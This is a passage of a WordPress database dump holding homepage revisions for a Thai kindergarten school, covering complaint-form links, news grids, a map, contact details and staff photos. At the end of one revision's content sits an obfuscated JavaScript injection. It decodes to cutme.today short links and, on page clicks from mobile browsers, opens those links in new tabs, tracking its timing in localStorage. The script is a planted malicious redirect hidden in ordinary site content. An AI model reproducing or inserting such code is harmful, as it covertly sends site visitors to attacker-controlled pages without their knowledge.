8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 10:37:51','2025-07-15 03:37:51','',19,'http://watprato.ssk.in.th/?p=672',0,'revision','',0),
(673,1,'2025-07-15 10:39:11','2025-07-15 03:39:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn 